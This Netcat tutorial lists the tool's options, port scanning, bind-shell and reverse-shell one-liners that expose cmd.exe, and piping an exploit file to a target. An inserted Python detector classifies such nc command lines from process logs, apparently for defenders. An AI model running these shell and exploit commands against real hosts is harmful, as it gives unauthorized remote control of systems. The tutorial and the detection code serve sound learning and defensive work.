Netcat is known as the 'Swiss Army knife' of network security tools; hardly anyone working in this area is unfamiliar with it. It is a simple, useful utility that reads and writes data across network connections using TCP or UDP. It is designed to be a reliable back-end tool that can be used directly or driven easily by other programs and scripts. At the same time it is a powerful network debugging and probing tool that can set up almost any kind of network connection you need, and it has several very interesting built-in features (see the usage examples below for details).
In China, two Windows versions circulate: the original port by Chris Wysopal, and a newer slimmed-down version (from 'Red and Black'). The slimmed-down version's main program is only a little over 10 KB (this ~10 KB nc cannot perform usages 4 and 5 described below; the original nc that still has that function is about 60 KB :p). Although small in size, it still gets a great deal of work done.

Software introduction:
Tool name: Netcat
Authors: Hobbit && Chris Wysopal
URL: http://www.atstake.com/research/tools/network_utilities/
Category: open source
Platforms: Linux / BSD / Unix / Windows
Windows version: [v1.10 NT]
Parameter introduction:
'nc.exe -h' shows the meaning of each parameter.
Basic format:
  connect to somewhere: nc [-options] hostname port[s] [ports] ...
  listen for inbound:   nc -l -p port [options] [hostname] [port]
Options:
  -d           background (detached) mode
  -e prog      program to run on the connection once it is made [dangerous!!]
  -g gateway   source-routing hop point[s], up to 8
  -G num       source-routing pointer: 4, 8, 12, ...
  -h           help
  -i secs      delay interval for lines sent and ports scanned
  -l           listen mode, for inbound connections
  -L           listen harder: re-listen after the connection is closed
  -n           numeric IP addresses only, no hostnames
  -o file      hex dump of the traffic to file
  -p port      local port number
  -r           randomize local and remote ports
  -s addr      local source address
  -t           answer Telnet negotiation (Telnet interactive mode)
  -u           UDP mode
  -v           verbose output; use -v twice for more detail
  -w secs      timeout in seconds for connects and final reads
  -z           zero-I/O mode, used for scanning
Port numbers can be given individually or as a range m-n.
Basic usage:
Roughly speaking, there are these usages:
1) Connect to a remote host. Example: nc -nvv 192.168.x.x 80. Explanation: connect to TCP port 80 of 192.168.x.x.
2) Listen on the local host. Example: nc -l -p 80. Explanation: listen on TCP port 80 of this machine.
3) Scan a remote host. Example: nc -nvv -w2 -z 192.168.x.x 80-445. Explanation: scan all ports of 192.168.x.x from TCP 80 through TCP 445.
4) Bind a shell on the remote host. Example: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe. Explanation: bind the remote host's cmd shell to TCP port 5354 of the remote host.
5) Bind a shell on the remote host and connect back. Example: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354. Explanation: bind the remote host's cmd shell and connect it back to TCP port 5354 of 192.168.x.x.
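From the defender's side, usages 2 through 5 are told apart by the flags just explained (-l/-L, -p, -e, -z). The following is an added example, not code from the page: a small parser for nc 1.10 command lines that classifies process-creation records by those flags. The log records and the 192.0.2.x addresses are constructed sample data.

```python
# Classify nc command lines from process-creation logs by the flags explained
# above. Added example; the records below are constructed, not real telemetry.
ARG_FLAGS = set("egGiopsw")   # nc 1.10 options that consume an argument

def parse_nc(cmdline):
    """Return (flags, positional) for an nc command line. flags maps an option
    letter to its argument (or True); positional holds host/port words."""
    toks = cmdline.split()[1:]          # drop the program name
    flags, positional, i = {}, [], 0
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("-") and len(tok) > 1:
            j = 1
            while j < len(tok):         # combined flags such as -nvv or -w2
                letter = tok[j]
                if letter in ARG_FLAGS:
                    rest = tok[j + 1:]  # "-ec:\cmd.exe" keeps the arg attached
                    if rest:
                        flags[letter] = rest
                    else:
                        i += 1
                        flags[letter] = toks[i] if i < len(toks) else ""
                    break
                flags[letter] = True
                j += 1
        else:
            positional.append(tok)
        i += 1
    return flags, positional

def classify_nc(cmdline):
    """Map a command line to the nc usage it implements; None if it is not nc."""
    words = cmdline.split()
    prog = words[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if words else ""
    if prog not in ("nc", "nc.exe"):
        return None
    flags, positional = parse_nc(cmdline)
    listening = "l" in flags or "L" in flags
    if "e" in flags and listening:
        return "bind_shell"       # usage 4: -l -p port -e cmd.exe
    if "e" in flags and positional:
        return "reverse_shell"    # usage 5: -e cmd.exe host port
    if "z" in flags:
        return "port_scan"        # usage 3: -z host port-range
    if listening:
        return "listener"         # usage 2 (and the honeypot usages)
    return "connect" if positional else "unknown"   # usage 1

SAMPLE_RECORDS = [   # constructed (host, command line) records
    ("ws01", r"nc.exe -l -p 5354 -t -e c:\winnt\system32\cmd.exe"),
    ("ws02", r"C:\tools\nc.exe -t -ec:\winnt\system32\cmd.exe 192.0.2.10 5354"),
    ("ws03", "nc -nvv -w2 -z 192.0.2.10 80-445"),
    ("ws04", "nc -L -p 80"), ("ws05", "nc -nvv 192.0.2.10 80"),
    ("ws06", r"C:\Windows\notepad.exe"),
]

def find_shell_usage(records):
    """Return (host, verdict) for records that expose a shell over the network."""
    hits = [(h, classify_nc(c)) for h, c in records]
    return [(h, v) for h, v in hits if v in ("bind_shell", "reverse_shell")]
```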
The above are the most basic usages (in fact nc has many more uses, and it becomes far more powerful once combined with the pipe "|" and the redirection operators "<" and ">" ...).

Advanced usage:
6) Used in an attack. Examples: format 1: type.exe c:\exploit.txt | nc -nvv 192.168.x.x 80; format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt. Note: c:\exploit.txt holds the shellcode and so on.
7) Honeypot usage [1]. Example: nc -L -p 80. Explanation: with -L (note the uppercase L) the port stays listened on until Ctrl-C.
8) Honeypot usage [2]. Example: nc -l -p 80 > c:\log.txt. Explanation: use -l to keep listening on a port until Ctrl-C and write whatever arrives to c:\log.txt; change ">" to ">>" and the log is appended to instead of overwritten. Note: c:\log.txt is the log file.
9) Honeypot usage [3]. Example: format 1: nc -l -p 80 < c:\honeypot.txt. Note: c:\honeypot.txt holds the decoy data.